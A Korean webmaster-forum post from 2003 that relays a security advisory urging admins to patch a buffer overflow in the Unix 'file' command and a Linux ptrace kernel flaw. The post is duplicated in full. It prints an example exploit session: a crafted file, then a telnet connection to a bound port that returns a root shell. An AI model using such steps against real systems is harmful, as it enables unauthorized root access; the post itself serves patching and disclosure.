웹마스터 팁
page_full_width" class="col-xs-12" |cond="$__Context->page_full_width">
file 명령어의 취약성
2003.03.25 22:35
1. file 명령어의 취약성
특정 파일의 속성을 확인하기 위해 자주 사용되는 명령어중
3.41 이전의 모든 file 패키지에 버퍼 오버플로우가 발견되었습니다.
이 취약성을 이용하여 일반 유저가 컴파일한 파일을 누군가가 실행시
실행한 유저권한으로 포트를 바인딩하거나 기타 다른 명령어를
실행할 수 있게 됩니다.
따라서 이전 버전을 사용하시는 분들은 모두 패치하시기 바랍니다.
(레드햇의 경우 8.0 을 포함하여 모든 버전이 취약합니다.)
실행예)
$ gcc -o exploit exploit.c
$ ./exploit file_this
[+] Creating a evil file file_this!
[+] Using address of shellcode = 0xbfffbd40
이후 root 등 다른 유저가, 생성된 exploit 파일을 실행함.
# file file_this
File: ASCII text
원격지에서 해당 유저가 바인딩한 포트(2003)로 접속시도.
$ telnet exploit.server.com 2003
Trying exploit.server.com...
Connected to localhost.
Escape character is '^]'.
id;
uid=0(root) gid=0(root)
groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
// root 권한으로 접속가능.
물론 실행한 exploit 코드를 특정 유저가 실행하여야 한다는 제한점이 있습니다.
아울러 포트는 충분히 변경될 수 있으며 본 취약성을 이용하여
단지 포트를 바인드 하는 외에 파일을 삭제하거나 메일을 발송하는등
다른 방법으로 충분히 응용될 수 있습니다.
자세한 사항은 아래 URL 을 참고하시기 바랍니다.
https://rhn.redhat.com/errata/RHSA-2003-086.html
ftp://ftp.astron.com/pub/file/
2. 리눅스 커널의 ptrace 취약성과 관련하여
리눅스 커널의 ptrace 취약성과 관련하여 보낸 메일중 수정하여야 할
사항이 있어 다시 메일을 드립니다.
(1) 본 취약성과 관련하여 커널 패치가 어려운 경우 임시방편으로
/proc 의 퍼미션을 변경하는 것은 적용이 되는 것을 확인하였습니다.
번거롭게 해 드려 죄송합니다.
(2) 상위버전으로 kernel 패치시 에러가 날 수 있습니다.
이때는 /usr/src/linux 디렉토리로 이동하여
patch -p1 < patch-2.4.20 을 실행한 후 재컴파일을 하시면 됩니다.
감사합니다.
certcc.or.kr 메일링 서비스로 오늘과내일의 홍석범님이 알려주신 사항입니다.
특정 파일의 속성을 확인하기 위해 자주 사용되는 명령어중
3.41 이전의 모든 file 패키지에 버퍼 오버플로우가 발견되었습니다.
이 취약성을 이용하여 일반 유저가 컴파일한 파일을 누군가가 실행시
실행한 유저권한으로 포트를 바인딩하거나 기타 다른 명령어를
실행할 수 있게 됩니다.
따라서 이전 버전을 사용하시는 분들은 모두 패치하시기 바랍니다.
(레드햇의 경우 8.0 을 포함하여 모든 버전이 취약합니다.)
실행예)
$ gcc -o exploit exploit.c
$ ./exploit file_this
[+] Creating a evil file file_this!
[+] Using address of shellcode = 0xbfffbd40
이후 root 등 다른 유저가, 생성된 exploit 파일을 실행함.
# file file_this
File: ASCII text
원격지에서 해당 유저가 바인딩한 포트(2003)로 접속시도.
$ telnet exploit.server.com 2003
Trying exploit.server.com...
Connected to localhost.
Escape character is '^]'.
id;
uid=0(root) gid=0(root)
groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
// root 권한으로 접속가능.
물론 실행한 exploit 코드를 특정 유저가 실행하여야 한다는 제한점이 있습니다.
아울러 포트는 충분히 변경될 수 있으며 본 취약성을 이용하여
단지 포트를 바인드 하는 외에 파일을 삭제하거나 메일을 발송하는등
다른 방법으로 충분히 응용될 수 있습니다.
자세한 사항은 아래 URL 을 참고하시기 바랍니다.
https://rhn.redhat.com/errata/RHSA-2003-086.html
ftp://ftp.astron.com/pub/file/
2. 리눅스 커널의 ptrace 취약성과 관련하여
리눅스 커널의 ptrace 취약성과 관련하여 보낸 메일중 수정하여야 할
사항이 있어 다시 메일을 드립니다.
(1) 본 취약성과 관련하여 커널 패치가 어려운 경우 임시방편으로
/proc 의 퍼미션을 변경하는 것은 적용이 되는 것을 확인하였습니다.
번거롭게 해 드려 죄송합니다.
(2) 상위버전으로 kernel 패치시 에러가 날 수 있습니다.
이때는 /usr/src/linux 디렉토리로 이동하여
patch -p1 < patch-2.4.20 을 실행한 후 재컴파일을 하시면 됩니다.
감사합니다.
certcc.or.kr 메일링 서비스로 오늘과내일의 홍석범님이 알려주신 사항입니다.
제목 | 글쓴이 | 날짜 |
---|---|---|
IIS 5.0 WebDAV Buffer Overflow 취약점에 대한 공격빈도 증가 | DearMai | 2003.05.17 |
커널에러 복구 하기~~~ [5] | 서인구 | 2003.05.11 |
윈도2000 서버에서 DNS 서버 운영하기 | DearMai | 2003.05.10 |
apache 98 % 활용하기 ! (윈도우버젼) [13] | 이성헌 | 2003.05.09 |
DNS서버 만들기 [4] | 제르디스™ | 2003.05.04 |
NSLOOKUP 으로 서브도메인과 메일서버 알아보기 [6] | 환군+ | 2003.05.02 |
MASQUERADE 클라이언트 IP 자동으로 부여해주기 [1] | 엔포게이트 | 2003.05.01 |
MASQUERADE 클라이언트 컴퓨터 인터넷 되게..^^; [4] | 김도진 | 2003.04.25 |
APM_Setup4에서 CGI 쉽게 설치하기 [3] | RedEye | 2003.04.14 |
(더 성공률 높은)Apache에서 ASP돌리기(초간다안!!) [6] | okw1003 | 2003.04.09 |
mysqldump를 이용해서 원하는 조건의 record만 뽑아내기 [2] | 겨울늑대 | 2003.04.08 |
mysql DB 주기적 자동 백업 하기 [8] | 김령현 | 2003.04.04 |
md5 암호화 알고리즘을 488bit blf 알고리즘으로 바꾸기 [17] | 김령현 | 2003.04.04 |
센드메일 에라타.. | 선장 | 2003.04.01 |
특정 유저만 su root 허용 | 군고구마 | 2003.04.01 |
서버의 아파치보안 테스트 해보세요 [12] | 김령현 | 2003.03.26 |
file 명령어의 취약성 [1] | DearMai | 2003.03.25 |
무선랜 솔루션에 대해서. 저도^^; | Dopesoul | 2003.03.21 |
무선 네트웍 구성. [2] | 지니 | 2003.03.21 |
커널 2.4 local ptrace-related vulnerability 패치하세요~ [8] | 김도한 | 2003.03.20 |